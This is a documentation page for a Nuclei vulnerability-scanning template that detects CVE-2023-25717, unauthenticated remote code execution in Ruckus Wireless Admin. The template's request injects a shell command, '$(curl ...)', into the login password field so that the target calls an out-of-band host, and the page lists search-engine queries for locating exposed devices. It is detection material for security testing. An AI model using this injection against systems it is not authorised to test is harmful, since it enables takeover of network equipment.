Skip to content
Nuclei Templates

Ruckus Wireless Admin - Remote Code Execution

ID: CVE-2023-25717

Severity: critical

Author: parthmalhotra,pdresearch

Tags: cve2023,cve,ruckus,rce,kev,ruckuswireless

Description

Section titled “Description”

Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request.

YAML Source

Section titled “YAML Source”
id: CVE-2023-25717


info:
  name: Ruckus Wireless Admin - Remote Code Execution
  author: parthmalhotra,pdresearch
  severity: critical
  description: |
    Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request.
  impact: |
    Remote code execution vulnerability in Ruckus Wireless Admin allows attackers to execute arbitrary code on the target system.
  remediation: |
    Apply the latest security patches and updates provided by Ruckus Wireless to mitigate the vulnerability.
  reference:
    - https://cybir.com/2023/cve/proof-of-concept-ruckus-wireless-admin-10-4-unauthenticated-remote-code-execution-csrf-ssrf/
    - https://support.ruckuswireless.com/security_bulletins/315
    - https://nvd.nist.gov/vuln/detail/CVE-2023-25717
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-25717
    cwe-id: CWE-94
    epss-score: 0.95613
    epss-percentile: 0.99262
    cpe: cpe:2.3:a:ruckuswireless:ruckus_wireless_admin:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: ruckuswireless
    product: ruckus_wireless_admin
    shodan-query:
      - title:"ruckus wireless"
      - http.title:"ruckus wireless"
    fofa-query: title="ruckus wireless"
    google-query: intitle:"ruckus wireless"
  tags: cve2023,cve,ruckus,rce,kev,ruckuswireless


http:
  - method: GET
    path:
      - "{{BaseURL}}/forms/doLogin?login_username=admin&password=password$(curl%20{{interactsh-url}})&x=0&y=0"


    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'http')
          - contains_all(to_lower(interactsh_request), 'user-agent','curl')
          - status_code_1 == 302
        condition: and
# digest: 4a0a0047304502207832e053243d963080d372f400e87368a39b33a6654dc7f68d52d6a7eb411810022100ec7a7ce61a2c54639f513a92f97a0e6a10e28d6977c9e70e791fa20a436cae76:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-25717.yaml"

View on Github